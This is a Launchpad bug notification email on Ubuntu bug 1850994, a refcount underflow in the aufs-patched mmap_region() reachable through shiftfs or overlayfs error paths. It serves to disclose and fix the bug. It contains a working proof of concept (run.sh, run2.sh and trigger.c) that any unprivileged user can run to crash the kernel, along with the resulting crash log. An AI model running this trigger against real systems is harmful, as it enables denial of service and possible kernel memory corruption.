** Tags added: patch

-- 
You received this bug notification because you are a member of Kernel
Packages, which is subscribed to linux in Ubuntu.
https://bugs.launchpad.net/bugs/1850994

Title:
  ubuntu-aufs-modified mmap_region() breaks refcounting in
  overlayfs/shiftfs error path

Status in linux package in Ubuntu:
  In Progress
Status in linux source package in Disco:
  In Progress
Status in linux source package in Eoan:
  In Progress
Status in linux source package in Focal:
  In Progress

Bug description:
  SRU Justification

  Impact: overlayfs and shiftfs both replace vma->vm_file in their mmap
  handlers. On error the original value is not restored, and the
  reference is put for the file to which vm_file points. On upstream
  kernels this is not an issue, as no callers dereference vm_file
  after call_mmap() returns an error. However, the aufs patches change
  mmap_region() to replace the fput() using a local variable with
  vma_fput(), which will fput() vm_file, leading to a refcount
  underflow.

  Fix: Restore the original vma->vm_file value on error.

  Test Case: See below.

  Regression Potential: Minimal. As stated above, other callers of
  call_mmap() do not dereference vma->vm_file when it returns an error,
  and the one which does is fixed by these patches.

  Notes: Supported kernels prior to disco are not affected as overlayfs
  did not support mmap until 4.19, and shiftfs was not present in Ubuntu
  kernels before disco. The issue is mitigated for overlayfs by another
  bug which is preventing unprivileged mounting; a patch for this issue
  will be sent separately.

  ---

  Tested on 19.10.

  Ubuntu's aufs kernel patch includes the following change (which,
  interestingly, I can't see in the AUFS code at
  https://github.com/sfjro/aufs5-linux/blob/master/mm/mmap.c):

  ==================================================================
  +#define vma_fput(vma)                  vma_do_fput(vma, __func__, __LINE__)
  [...]
  @@ -1847,8 +1847,8 @@ unsigned long mmap_region(struct file *file, unsigned long addr,
          return addr;

   unmap_and_free_vma:
  +       vma_fput(vma);
          vma->vm_file = NULL;
  -       fput(file);

          /* Undo any partial mapping done by a device driver. */
          unmap_region(mm, vma, prev, vma->vm_start, vma->vm_end);
  [...]
  +void vma_do_fput(struct vm_area_struct *vma, const char func[], int line)
  +{
  +       struct file *f = vma->vm_file, *pr = vma->vm_prfile;
  +
  +       prfile_trace(f, pr, func, line, __func__);
  +       fput(f);
  +       if (f && pr)
  +               fput(pr);
  +}
  ==================================================================

  This means that in the case where call_mmap() returns an error to
  mmap_region(), fput() will be called on the current value of
  vma->vm_file instead of the saved file pointer. This matters if the
  ->mmap() handler replaces ->vm_file before returning an error code.

  overlayfs and shiftfs do that when call_mmap() on the lower filesystem fails,
  see ovl_mmap() and shiftfs_mmap().

  To demonstrate the issue, the PoC below mounts a shiftfs that is backed by a
  FUSE filesystem with the FUSE flag FOPEN_DIRECT_IO, which causes
  fuse_file_mmap() to bail out with -ENODEV if MAP_SHARED is set.

  I would have used overlayfs instead, but there is an unrelated bug that makes
  it impossible to mount overlayfs inside a user namespace:
  Commit 82c0860106f264 ("UBUNTU: SAUCE: overlayfs: Propogate nosuid from lower
  and upper mounts") defines SB_I_NOSUID as 0x00000010, but SB_I_USERNS_VISIBLE
  already has the same value. This causes mount_too_revealing() to bail out
  with a WARN_ONCE().

  Note that this PoC requires the "bindfs" package and should be executed with
  "slub_debug" on the kernel command line to get a clear crash.

  ==================================================================
  Ubuntu 19.10 user-Standard-PC-Q35-ICH9-2009 ttyS0

  user-Standard-PC-Q35-ICH9-2009 login: user
  Password:
  Last login: Fr Nov  1 23:45:36 CET 2019 on ttyS0
  Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-19-generic x86_64)

   * Documentation:  https://help.ubuntu.com
   * Management:     https://landscape.canonical.com
   * Support:        https://ubuntu.com/advantage

  0 updates can be installed immediately.
  0 of these updates are security updates.

  user@user-Standard-PC-Q35-ICH9-2009:~$ ls
  aufs-mmap  Documents  Music     Public     trace.dat
  Desktop    Downloads  Pictures  Templates  Videos
  user@user-Standard-PC-Q35-ICH9-2009:~$ cd aufs-mmap/
  user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat /proc/cmdline
  BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=f7d8d4fb-0c96-498e-b875-0b777127a332 ro console=ttyS0 slub_debug quiet splash vt.handoff=7
  user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run.sh
  #!/bin/sh
  sync
  unshare -mUr ./run2.sh
  user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run2.sh
  #!/bin/bash
  set -e

  mount -t tmpfs none /tmp
  mkdir -p /tmp/{lower,middle,upper}
  touch /tmp/lower/foo
  # mount some random FUSE filesystem with direct_io,
  # doesn't really matter what it does as long as
  # there's a file in it.
  # (this is just to get some filesystem that can
  # easily be convinced to throw errors from f_op->mmap)
  bindfs -o direct_io /tmp/lower /tmp/middle
  # use the FUSE filesystem to back shiftfs.
  # overlayfs would also work if SB_I_NOSUID and
  # SB_I_USERNS_VISIBLE weren't defined to the same
  # value...
  mount -t shiftfs -o mark /tmp/middle /tmp/upper
  mount|grep shift
  gcc -o trigger trigger.c -Wall
  ./trigger
  user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat trigger.c
  #include <fcntl.h>
  #include <err.h>
  #include <unistd.h>
  #include <sys/mman.h>
  #include <stdio.h>

  int main(void) {
    int foofd = open("/tmp/upper/foo", O_RDONLY);
    if (foofd == -1) err(1, "open foofd");
    void *badmap = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
    if (badmap == MAP_FAILED) {
      perror("badmap");
    } else {
      errx(1, "badmap worked???");
    }
    sleep(1);
    mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
  }
  user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ ./run.sh
  /tmp/middle on /tmp/upper type shiftfs (rw,relatime,mark)
  badmap: No such device
  [   72.101721] general protection fault: 0000 [#1] SMP PTI
  [   72.111917] CPU: 1 PID: 1376 Comm: trigger Not tainted 5.3.0-19-generic 
#20-Ubuntu
  [   72.124846] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 
1.12.0-1 04/01/2014
  [   72.140965] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
  [   72.149210] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 
41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 
60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
  [   72.167229] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
  [   72.170426] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 
7800000000000000
  [   72.174528] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: 
ffff9c1cc48b5900
  [   72.177790] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 
0000000000000000
  [   72.181199] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: 
ffff9c1cf1ae5790
  [   72.186306] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: 
ffff9c1cf7209740
  [   72.189705] FS:  00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) 
knlGS:0000000000000000
  [   72.193073] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
  [   72.195390] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 
0000000000360ee0
  [   72.198237] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 
0000000000000000
  [   72.200557] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 
0000000000000400
  [   72.202815] Call Trace:
  [   72.203712]  mmap_region+0x417/0x670
  [   72.204868]  do_mmap+0x3a8/0x580
  [   72.205939]  vm_mmap_pgoff+0xcb/0x120
  [   72.207954]  ksys_mmap_pgoff+0x1ca/0x2a0
  [   72.210078]  __x64_sys_mmap+0x33/0x40
  [   72.211327]  do_syscall_64+0x5a/0x130
  [   72.212538]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
  [   72.214177] RIP: 0033:0x7faa3ecc7af6
  [   72.215352] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 
89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 
f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
  [   72.222275] RSP: 002b:00007ffd0fc44c68 EFLAGS: 00000246 ORIG_RAX: 
0000000000000009
  [   72.224714] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 
00007faa3ecc7af6
  [   72.228123] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 
0000000000000000
  [   72.230913] RBP: 0000000000000000 R08: 0000000000000003 R09: 
0000000000000000
  [   72.233193] R10: 0000000000000001 R11: 0000000000000246 R12: 
0000556248213100
  [   72.235448] R13: 00007ffd0fc44d70 R14: 0000000000000000 R15: 
0000000000000000
  [   72.237681] Modules linked in: shiftfs intel_rapl_msr 
snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core 
snd_hwdep snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi intel_rapl_common 
crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 
crypto_simd snd_seq cryptd glue_helper joydev input_leds serio_raw 
snd_seq_device snd_timer snd qxl ttm soundcore qemu_fw_cfg drm_kms_helper drm 
fb_sys_fops syscopyarea sysfillrect sysimgblt mac_hid sch_fq_codel parport_pc 
ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid 
virtio_net net_failover failover ahci psmouse lpc_ich i2c_i801 libahci 
virtio_blk
  [   72.257673] ---[ end trace 5d85e7b7b0bae5f5 ]---
  [   72.259237] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
  [   72.260990] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 
41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 
60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
  [   72.269615] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
  [   72.271414] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 
7800000000000000
  [   72.273893] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: 
ffff9c1cc48b5900
  [   72.276354] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 
0000000000000000
  [   72.278796] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: 
ffff9c1cf1ae5790
  [   72.281095] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: 
ffff9c1cf7209740
  [   72.284048] FS:  00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) 
knlGS:0000000000000000
  [   72.287161] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
  [   72.289164] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 
0000000000360ee0
  [   72.291953] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 
0000000000000000
  [   72.294487] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 
0000000000000400
  ==================================================================

  Faulting code:

  0000000F  55                push rbp
  00000010  4889E5            mov rbp,rsp
  00000013  4157              push r15
  00000015  4156              push r14
  00000017  4155              push r13
  00000019  4154              push r12
  0000001B  488B87C8000000    mov rax,[rdi+0xc8]
  00000022  4C8B6810          mov r13,[rax+0x10]
  00000026  498B4528          mov rax,[r13+0x28]
  0000002A  4883786000        cmp qword [rax+0x60],byte +0x0     <<<< GPF HERE
  0000002F  0F8497000000      jz near 0xcc
  00000035  4989FC            mov r12,rdi
  00000038  4989F6            mov r14,rsi

  As you can see, the poison value 6b6b6b6b6b6b6b6b is being
  dereferenced.

  This bug is subject to a 90 day disclosure deadline. After 90 days elapse
  or a patch has been made broadly available (whichever is earlier), the bug
  report will become visible to the public.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1850994/+subscriptions

-- 
Mailing list: https://launchpad.net/~kernel-packages
Post to     : kernel-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~kernel-packages
More help   : https://help.launchpad.net/ListHelp
